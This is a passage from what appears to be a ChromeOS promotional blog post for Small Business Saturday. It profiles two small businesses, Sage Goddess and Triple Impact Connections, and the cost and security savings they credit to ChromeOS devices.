Simple to manage
When it comes to device management, ChromeOS gives time back; ChromeOS devices are 63% faster to deploy and 36% easier to manage than other operating systems.8
Sage Goddess is an e-commerce and e-learning provider for spiritual tools and teachings, reaching over two million people across the globe every week.
As the business grew with new employees and new devices, the business needed cost effective device management. Sage Goddess deployed 60 ChromeOS devices across different functions in the organization, and were able to centrally manage devices and keep them secure.
ChromeOS makes IT management easy, so we can focus on growing our business. We appreciate the simplicity because in the past, those management tasks were often time-consuming and complicated,
David Meizlik
President and COO, Sage Goddess
Save money Chromebooks are generally more affordable than traditional laptops, making them an attractive option for budget-conscious small businesses. Additionally, ChromeOS devices require minimal maintenance or software add-ons, reducing IT costs.
One business benefiting from this is Triple Impact Connections, a veteran-owned business processing outsourcing (BPO) company based in Killeen, Texas. Triple Impact Connections delivers contact center services for banking, healthcare and retail. The company’s management and agent workforce is made up almost entirely of military spouses and disabled veterans.
To stay competitive, Triple Impact Connections was looking to save on costs without compromising high performance. ChromeOS allows Triple Impact Connections to use ChromeOS devices for longer periods with automatic updates, helping the company save 30% on deployment costs when onboarding new employees.
ChromeOS devices are designed to be durable and receive 10 years of automatic updates,** allowing Triple Impact Connections agents to use them for longer periods and reduce device replacement costs. In addition, since ChromeOS automatically updates in the background, we can rest assured that our devices are secure—saving us $60,000 per year on cybersecurity monitoring,
These small-businesses are all driving transformative change for their communities in their own unique way. ChromeOS supports your journey by providing secure and cost-effective devices, freeing up IT teams, and giving back time to small business owners to do what they love. If you’re a small business owner looking for security you can trust, explore the possibilities with ChromeOS. Visit ChromeOS to learn more, or try our quiz to learn how you can get started with ChromeOS.
Ready to celebrate Small Business Saturday? Show your support by shopping local, leaving positive reviews, and spreading the word about your favorite small businesses.
*As of 2024, there has been no evidence of any documented, successful virus attack or ransomware attack on ChromeOS. Data based on ChromeOS monitoring of various national and internal databases.
**For devices prior to 2021 that are eligible to receive extended updates, some features and services may not be supported. See our Help Center for details.